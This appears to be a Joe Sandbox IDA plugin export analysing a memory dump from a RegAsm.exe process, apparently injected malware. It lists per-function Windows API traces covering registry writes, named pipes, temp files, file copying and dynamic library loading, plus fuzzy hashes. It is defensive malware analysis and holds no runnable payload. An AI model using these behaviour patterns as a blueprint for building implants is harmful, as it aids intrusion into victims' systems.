Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
String ID: D
API String ID: 2463014471-2746444292
Opcode ID: 4d32512954e5ba8a012d20708a56b7202a36d16cc9da2ba74af2c70f24a7f122
Instruction ID: 5c71266bc4c2201a10ff317271a37b5e667664cd78662b044d230e007afd0905
Opcode Fuzzy Hash: 4d32512954e5ba8a012d20708a56b7202a36d16cc9da2ba74af2c70f24a7f122
Instruction Fuzzy Hash: B8415B72D0021DFFDF21EFA8CD849AEBBBCEB08244F14406AEA01F6180D7755E10AB61

Uniqueness

Uniqueness Score: -1.00%

Function 03F1126C, Relevance: 21.2, APIs: 14, Instructions: 230memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F0B84E: RegQueryValueExA.KERNELBASE(00000000,03F1BD19,00000000,03F1BD19,00000000,?,00000000,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?), ref: 03F0B886
Part of subcall function 03F0B84E: RtlAllocateHeap.NTDLL(00000000,?), ref: 03F0B89A
Part of subcall function 03F0B84E: RegQueryValueExA.ADVAPI32(00000000,03F1BD19,00000000,03F1BD19,00000000,?,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40), ref: 03F0B8B4
Part of subcall function 03F0B84E: RegCloseKey.ADVAPI32(00000000,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40,?,?,?,03F1BD19,00000000), ref: 03F0B8DE

HeapFree.KERNEL32(00000000,?,?,?,?), ref: 03F112B3
RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 03F112D1
HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 03F112FF
HeapFree.KERNEL32(00000000,03F263D8,0000002A,00000000,00000000,00000000), ref: 03F11373
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03F11436
wsprintfA.USER32 ref: 03F11451
lstrlen.KERNEL32(00000000,00000000), ref: 03F1145C
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03F11473
HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001), ref: 03F11495
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03F114B0
wsprintfA.USER32 ref: 03F114C7
lstrlen.KERNEL32(00000000,00000000), ref: 03F114D2

Part of subcall function 03F0A873: lstrlen.KERNEL32(03F046D1,00000000,?,00000000,?,?,03F046D1,00000035,00000000,?,00000000), ref: 03F0A8A3
Part of subcall function 03F0A873: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 03F0A8B9
Part of subcall function 03F0A873: memcpy.NTDLL(00000010,03F046D1,00000000,?,?,03F046D1,00000035,00000000), ref: 03F0A8EF
Part of subcall function 03F0A873: memcpy.NTDLL(00000010,00000000,00000035,?,?,03F046D1,00000035), ref: 03F0A90A
Part of subcall function 03F0A873: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 03F0A928
Part of subcall function 03F0A873: GetLastError.KERNEL32(?,?,03F046D1,00000035), ref: 03F0A932
Part of subcall function 03F0A873: HeapFree.KERNEL32(00000000,00000000,?,?,03F046D1,00000035), ref: 03F0A955

HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03F114E9
HeapFree.KERNEL32(00000000,?,?,00000001), ref: 03F114F9

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
String ID:
API String ID: 3733591251-0
Opcode ID: a3c3906d84ef6e539ae1e7ed7dd7c47e863f4cb52dd95adfe391608ebdab8b69
Instruction ID: 13ec67f21a8f52c4f49b363dc159df5282a0967a648f5135b76c7f8284244dfc
Opcode Fuzzy Hash: a3c3906d84ef6e539ae1e7ed7dd7c47e863f4cb52dd95adfe391608ebdab8b69
Instruction Fuzzy Hash: 9F818975D0021AEFDB20EFA5EC94DAEBBB9FB08300F140569E611A7254C7709E51EB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F18109, Relevance: 21.2, APIs: 14, Instructions: 206memorystringthreadCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 03F18158
StrTrimA.SHLWAPI(00000001,?), ref: 03F18171
StrChrA.SHLWAPI(?,0000002C), ref: 03F1817C
StrTrimA.SHLWAPI(00000001,?), ref: 03F18195
lstrlen.KERNEL32(?,?,00000001,?,?), ref: 03F18238
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 03F1825A
lstrcpy.KERNEL32(00000020,?), ref: 03F18279
lstrlen.KERNEL32(?), ref: 03F18283
memcpy.NTDLL(?,?,?), ref: 03F182C4
memcpy.NTDLL(?,?,?), ref: 03F182D7
SwitchToThread.KERNEL32(?,00000000,?,?), ref: 03F182FB
HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 03F1831D
HeapFree.KERNEL32(00000000,?,?,00000001,?,?), ref: 03F18343
HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?), ref: 03F1835F

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
String ID:
API String ID: 3323474148-0
Opcode ID: ce614cdc1230386751f1754b6102a29be63a69de6879ec7ec6538360481a66a2
Instruction ID: 54d3d498a0385c64d25f44bfe1ad14bf0de27757afcbccde96d2de54addd4ca0
Opcode Fuzzy Hash: ce614cdc1230386751f1754b6102a29be63a69de6879ec7ec6538360481a66a2
Instruction Fuzzy Hash: 2D717832904346EFC721DF64E944A9BBBE8FB48344F08092DF999D7250D770E964CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03F2341A, Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000), ref: 03F23431
lstrlen.KERNEL32(?,?,00000000), ref: 03F23438
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F2344F
lstrcpy.KERNEL32(00000000,?), ref: 03F23460
lstrcat.KERNEL32(?,?), ref: 03F2347C
lstrcat.KERNEL32(?,?), ref: 03F2348D
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F2349E
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F2353B
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 03F23574
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 03F2358D
CloseHandle.KERNEL32(00000000,?,00000000), ref: 03F23597
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 03F235A7
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 03F235C0
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 03F235D0

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
String ID:
API String ID: 333890978-0
Opcode ID: 2ab4c1b1eaa5635e1dcd08cb177136193f921ebb5ef72618e2616f97e866ace1
Instruction ID: f18379f2669e8a68149f4c9bb8f792e4fd6fc335472f01b2b298b65446efaf85
Opcode Fuzzy Hash: 2ab4c1b1eaa5635e1dcd08cb177136193f921ebb5ef72618e2616f97e866ace1
Instruction Fuzzy Hash: 20518AB680011EFFCB22EFA4CC94CAEBBBDFB48244B154466F914D7164CB349A469F60

Uniqueness

Uniqueness Score: -1.00%

Function 03F14659, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 128timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 03F1469B
OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 03F146AE
CloseHandle.KERNEL32(00000000), ref: 03F147C6

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

memset.NTDLL ref: 03F146D1
memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 03F14750
RtlEnterCriticalSection.NTDLL(?), ref: 03F14765
RtlLeaveCriticalSection.NTDLL(?), ref: 03F1477D
GetLastError.KERNEL32(03F0E0C4,?,?,?,?,?,?,?,00000040), ref: 03F14795
RtlEnterCriticalSection.NTDLL(?), ref: 03F147A1
RtlLeaveCriticalSection.NTDLL(?), ref: 03F147B0

Strings

W, xrefs: 03F147CC
0x%08X, xrefs: 03F1466D

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
String ID: 0x%08X$W
API String ID: 1559661116-2600449260
Opcode ID: b27d8550916761c03f47bb121ad498d3401110c198c03f7111977c50501ccd12
Instruction ID: 90163c62f8fb06cb3f6d014f90ccad1bdfb043be3aeb818dfeede4cf8396a7e5
Opcode Fuzzy Hash: b27d8550916761c03f47bb121ad498d3401110c198c03f7111977c50501ccd12
Instruction Fuzzy Hash: 77417FB1900309EFDB20EFA5D884A9EBBF8FF08354F104529F959E7690D3749A64CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F1F67F, Relevance: 21.1, APIs: 14, Instructions: 107libraryloaderstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,?,03F1BA4F,?,?), ref: 03F1F68C

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,03F1BA4F,?,?), ref: 03F1F6B5
lstrcpyW.KERNEL32(-0000FFFE,?), ref: 03F1F6D5
lstrcpyW.KERNEL32(-00000002,?), ref: 03F1F6F0
SetCurrentDirectoryW.KERNEL32(?,?,?,?,03F1BA4F,?,?), ref: 03F1F6FC
LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,03F1BA4F,?,?), ref: 03F1F6FF
SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,03F1BA4F,?,?), ref: 03F1F70B
GetProcAddress.KERNEL32(00000000,?), ref: 03F1F728
GetProcAddress.KERNEL32(00000000,?), ref: 03F1F742
GetProcAddress.KERNEL32(00000000,?), ref: 03F1F758
GetProcAddress.KERNEL32(00000000,?), ref: 03F1F76E
GetProcAddress.KERNEL32(00000000,?), ref: 03F1F784
GetProcAddress.KERNEL32(00000000,?), ref: 03F1F79A
FreeLibrary.KERNEL32(00000000,?,?,?,03F1BA4F,?,?), ref: 03F1F7C3

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
String ID:
API String ID: 3772355505-0
Opcode ID: afdbf8f313d265e30d214a4842fa90cda67b88a8e6006c9f9ab9fd270c3090ec
Instruction ID: 73756e025bebe166316e278b0ae1281897c1ab595d5fa47ccf3aabd131c3d338
Opcode Fuzzy Hash: afdbf8f313d265e30d214a4842fa90cda67b88a8e6006c9f9ab9fd270c3090ec
Instruction Fuzzy Hash: B83138B690031BEFD720EF64DC95D6ABBECFF14744B084626A849C7215DB78E811CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F236AA, Relevance: 21.1, APIs: 14, Instructions: 79stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,?,?,?,03F16081,?,?,?), ref: 03F236C1
lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,03F16081,?,?,?), ref: 03F236CC
lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,03F16081,?,?,?), ref: 03F236D4
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F236E9
lstrcpyW.KERNEL32(00000000,?), ref: 03F236FA
lstrcatW.KERNEL32(00000000,?), ref: 03F2370C
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,03F16081,?,?,?), ref: 03F23711
lstrcatW.KERNEL32(00000000,03F263D0), ref: 03F2371D
lstrcatW.KERNEL32(00000000), ref: 03F23725
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,03F16081,?,?,?), ref: 03F2372A
lstrcatW.KERNEL32(00000000,03F263D0), ref: 03F23736
lstrcatW.KERNEL32(00000000,00000002), ref: 03F23751
CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,03F16081,?,?,?), ref: 03F23759
HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,03F16081,?,?,?), ref: 03F23767

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID:
API String ID: 3635185113-0
Opcode ID: 56d2a514e68258078230580e84115a039d2e2afba51d857be1245e81fa6e4ccc
Instruction ID: 51a455c8fcedb5a50a0e57902877ca7b6f9aa8df4930ee314c0386662c264270
Opcode Fuzzy Hash: 56d2a514e68258078230580e84115a039d2e2afba51d857be1245e81fa6e4ccc
Instruction Fuzzy Hash: 5C21D13210422AEFC331BF94DC94F6FBFACEF95A91F010019F50192161DBA4A805AA64

Uniqueness

Uniqueness Score: -1.00%

Function 03F1EEDC, Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 03F08924: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 03F08969
Part of subcall function 03F08924: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 03F08981
Part of subcall function 03F08924: WaitForSingleObject.KERNEL32(00000000,?,00000000,03F14995,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F08A49
Part of subcall function 03F08924: HeapFree.KERNEL32(00000000,?,?,00000000,03F14995,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F08A72
Part of subcall function 03F08924: HeapFree.KERNEL32(00000000,03F14995,?,00000000,03F14995,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F08A82
Part of subcall function 03F08924: RegCloseKey.ADVAPI32(00000000,?,00000000,03F14995,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F08A8B

lstrcmp.KERNEL32(?,?), ref: 03F1EF53
HeapFree.KERNEL32(00000000,?), ref: 03F1EF7F
GetCurrentThreadId.KERNEL32 ref: 03F1F030
GetCurrentThread.KERNEL32 ref: 03F1F041
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,Function_000143BB,?,00000001), ref: 03F1F07E
HeapFree.KERNEL32(00000000,?,?,00000000,?,Function_000143BB,?,00000001), ref: 03F1F092
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03F1F0A0
wsprintfA.USER32 ref: 03F1F0B8

Part of subcall function 03F0888A: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,03F0EA9C,00000000,?,00000000,74E05520,00000000,?,03F0C8DA,?,?,?,00000000), ref: 03F08894
Part of subcall function 03F0888A: lstrcpy.KERNEL32(00000000,00000000), ref: 03F088B8
Part of subcall function 03F0888A: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,03F0C8DA,?,?,?,00000000,?,00000000,00000000), ref: 03F088BF
Part of subcall function 03F0888A: lstrcat.KERNEL32(00000000,?), ref: 03F08916

lstrlen.KERNEL32(00000000,00000000), ref: 03F1F0C3
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03F1F0DA
HeapFree.KERNEL32(00000000,00000000), ref: 03F1F0EB
HeapFree.KERNEL32(00000000,?), ref: 03F1F0F7

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
String ID:
API String ID: 773763258-0
Opcode ID: 7a2a942ab4975f2839a8ef560fcfbdbdc808e75579a81e56d0447e5c8dea4840
Instruction ID: b04752f48e011ede7d09ed82542bb9f561139d58a55ca6c55c1a935220418f21
Opcode Fuzzy Hash: 7a2a942ab4975f2839a8ef560fcfbdbdc808e75579a81e56d0447e5c8dea4840
Instruction Fuzzy Hash: A8713271D0021AEFCB20EFA5EC94EAEBBB9FB18350F148065E905E7260D731A955DF90

Uniqueness

Uniqueness Score: -1.00%

Function 03F1C0E8, Relevance: 18.2, APIs: 12, Instructions: 183synchronizationstringthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 03F1C10F
memcpy.NTDLL(?,?,00000010), ref: 03F1C132
memset.NTDLL ref: 03F1C17E
lstrcpyn.KERNEL32(?,?,00000034), ref: 03F1C192
GetLastError.KERNEL32 ref: 03F1C1C0
GetLastError.KERNEL32 ref: 03F1C207
GetLastError.KERNEL32 ref: 03F1C226
WaitForSingleObject.KERNEL32(?,000927C0), ref: 03F1C260
WaitForSingleObject.KERNEL32(?,00000000), ref: 03F1C26E
GetLastError.KERNEL32 ref: 03F1C2E8
ReleaseMutex.KERNEL32(?), ref: 03F1C2FA
RtlExitUserThread.NTDLL(?), ref: 03F1C310

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
String ID:
API String ID: 4037736292-0
Opcode ID: 4ceb281b63de761eebba12e276c905909b3a33a985dd399b15a8be7395bbbead
Instruction ID: bf203fa4f3f06cf51314e3faa142e94106c2e49b99e477d406c6478126b8985b
Opcode Fuzzy Hash: 4ceb281b63de761eebba12e276c905909b3a33a985dd399b15a8be7395bbbead
Instruction Fuzzy Hash: E5616B71944745EFC720EF65E848A2BF7F8BF84B11F048A1DF996D6190D7B4E8108B22

Uniqueness

Uniqueness Score: -1.00%

Function 03F1535F, Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,74E05520,?,00000000,?,?,?), ref: 03F15375
lstrlen.KERNEL32(?), ref: 03F1537D
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03F1538D
lstrcpy.KERNEL32(00000000,?), ref: 03F153AC
lstrlen.KERNEL32(?), ref: 03F153C1
lstrlen.KERNEL32(?), ref: 03F153CF
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 03F1541D
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 03F15441
lstrlen.KERNEL32(?), ref: 03F15474
HeapFree.KERNEL32(00000000,?,?), ref: 03F1549F
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 03F154B6
HeapFree.KERNEL32(00000000,?,?), ref: 03F154C3

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrlen$Heap$Free$Allocatelstrcpy
String ID:
API String ID: 904523553-0
Opcode ID: 7f4f13164609c270e565190c238286a42398d53c25523ec1f2185458851c6657
Instruction ID: 9c7b18c008609a0b4c48240bb13a6e0f33824040a6cadbfd2d1774747a2181d3
Opcode Fuzzy Hash: 7f4f13164609c270e565190c238286a42398d53c25523ec1f2185458851c6657
Instruction Fuzzy Hash: 33416A7290020AEFCF22DFA1EC50EAE7BBAFB85311F244465E81997150D771E961EF50

Uniqueness

Uniqueness Score: -1.00%

Function 03F01EF2, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 03F01F24
WaitForSingleObject.KERNEL32(000003C4,00000000), ref: 03F01F46
ConnectNamedPipe.KERNEL32(?,?), ref: 03F01F66
GetLastError.KERNEL32 ref: 03F01F70
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03F01F94
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 03F01FD7
DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 03F01FE0
WaitForSingleObject.KERNEL32(00000000), ref: 03F01FE9
CloseHandle.KERNEL32(?), ref: 03F01FFE
GetLastError.KERNEL32 ref: 03F0200B
CloseHandle.KERNEL32(?), ref: 03F02018
RtlExitUserThread.NTDLL(000000FF), ref: 03F0202E

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
String ID:
API String ID: 4053378866-0
Opcode ID: 7091244f49b80f7909b48f20a1094b1c6ea6597b7adee29977239a079592f266
Instruction ID: 1ac9a0f3b82d41ef5df75c6e1d2354f3c2f323cccb71cc70cba47cb684c695e0
Opcode Fuzzy Hash: 7091244f49b80f7909b48f20a1094b1c6ea6597b7adee29977239a079592f266
Instruction Fuzzy Hash: FC318E7040430AEFDB20EF68CC8896FBAADFB54355F004A29F5A5D20E1D7B09A05DB92

Uniqueness

Uniqueness Score: -1.00%

Function 03F1E26F, Relevance: 18.1, APIs: 12, Instructions: 94registrymemorystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 03F1E280
GetTempPathA.KERNEL32(00000000,00000000,?,?,03F104A9,?,00000094,00000000,?), ref: 03F1E298
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 03F1E2A7
GetTempPathA.KERNEL32(00000001,00000000,?,?,03F104A9,?,00000094,00000000,?), ref: 03F1E2BA
GetTickCount.KERNEL32 ref: 03F1E2BE
wsprintfA.USER32 ref: 03F1E2D5
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 03F1E310
StrRChrA.SHLWAPI(00000000,00000000,?), ref: 03F1E32D
lstrlen.KERNEL32(00000000), ref: 03F1E337
RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 03F1E347
RegCloseKey.ADVAPI32(?), ref: 03F1E353
HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000001,00000000,?), ref: 03F1E361

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
String ID:
API String ID: 3778301466-0
Opcode ID: b0cd25f37b7361df9f4ff0c2bf0338a8196db74378b644fe2f2979495191840f
Instruction ID: 9c3582e7cbb4d0350c7edcab0a1825ad0e8b5d1d3fe7ee96cc92c64f25f637f4
Opcode Fuzzy Hash: b0cd25f37b7361df9f4ff0c2bf0338a8196db74378b644fe2f2979495191840f
Instruction Fuzzy Hash: D6314671501219FFDB20AFA5EC98EAF7FACEF15394B084025F909C6214D7709E559FA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F0C83F, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 03F0C869
GetCurrentThreadId.KERNEL32 ref: 03F0C87F
GetCurrentThread.KERNEL32 ref: 03F0C890

Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000), ref: 03F0FC88
Part of subcall function 03F0FC76: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCA1
Part of subcall function 03F0FC76: GetCurrentThreadId.KERNEL32 ref: 03F0FCAE
Part of subcall function 03F0FC76: GetSystemTimeAsFileTime.KERNEL32(03F1B2AE,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCBA
Part of subcall function 03F0FC76: GetTempFileNameA.KERNEL32(00000000,00000000,03F1B2AE,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?), ref: 03F0FCC8
Part of subcall function 03F0FC76: lstrcpy.KERNEL32(00000000), ref: 03F0FCEA

Part of subcall function 03F0EA80: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,?,00000000,74E05520,00000000,?,03F0C8DA,?,?,?,00000000), ref: 03F0EAEB
Part of subcall function 03F0EA80: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,?,00000000,74E05520,00000000,?,03F0C8DA,?,?,?,00000000), ref: 03F0EB13

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000,?), ref: 03F0C90A
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,?,00000000,00000000,?), ref: 03F0C916
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03F0C965
wsprintfA.USER32 ref: 03F0C97D
lstrlen.KERNEL32(00000000,00000000), ref: 03F0C988
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03F0C99F

Strings

W, xrefs: 03F0C952

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
String ID: W
API String ID: 630447368-655174618
Opcode ID: c4d5f622da2f8c16c56901c7952082488849225dab8468504fee92b45d46209f
Instruction ID: 574b37e88b9a652f06d6fdd4cab795a6eb0b07efaf62b94d3c02ce9ee08e8921
Opcode Fuzzy Hash: c4d5f622da2f8c16c56901c7952082488849225dab8468504fee92b45d46209f
Instruction Fuzzy Hash: 52417B3190021AFFDF21EFA9DC54DAEBFB8FF18740B144126F945A6294D7309A51EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F0F3F2, Relevance: 16.7, APIs: 11, Instructions: 155registrystringfileCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03F0F41D

Part of subcall function 03F06D31: RegQueryValueExW.ADVAPI32(00000000,?,00000000,03F0F43D,00000000,?,74B606E0,?,03F0F43D,?,00000000,?,?,?,03F1CD34), ref: 03F06D58
Part of subcall function 03F06D31: RegQueryValueExW.ADVAPI32(80000001,80000001,00000000,00000000,00000000,80000001,80000001,80000001,?,?,03F1CD34), ref: 03F06D81
Part of subcall function 03F06D31: RegCloseKey.ADVAPI32(?,03F1CD34), ref: 03F06DB8

RegOpenKeyA.ADVAPI32(80000001,03F1CD34,?), ref: 03F0F458
lstrcpyW.KERNEL32(-00000002,F2E38C80), ref: 03F0F4B9
lstrcatW.KERNEL32(00000000,?), ref: 03F0F4CE
lstrcpyW.KERNEL32(?), ref: 03F0F4E8
lstrcatW.KERNEL32(00000000,?), ref: 03F0F4F7

Part of subcall function 03F16E2C: lstrlenW.KERNEL32(00000000,00000000,?,03F0F516,00000000,?,?,?,03F1CD34), ref: 03F16E3F
Part of subcall function 03F16E2C: lstrlen.KERNEL32(03F0F516,?,03F0F516,00000000,?,?,?,03F1CD34), ref: 03F16E4A
Part of subcall function 03F16E2C: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 03F16E5F

RegCloseKey.ADVAPI32(03F1CD34,?,03F1CD34,00000000,?,?,?,03F1CD34), ref: 03F0F561

Part of subcall function 03F23345: lstrlenW.KERNEL32(?,?,00000000,74E04D40,?,?,03F0874D,?,74E04D40), ref: 03F23351
Part of subcall function 03F23345: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,03F0874D,?,74E04D40), ref: 03F23379
Part of subcall function 03F23345: memset.NTDLL ref: 03F2338B

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,03F1CD34), ref: 03F0F596
GetLastError.KERNEL32(?,?,03F1CD34), ref: 03F0F5A1
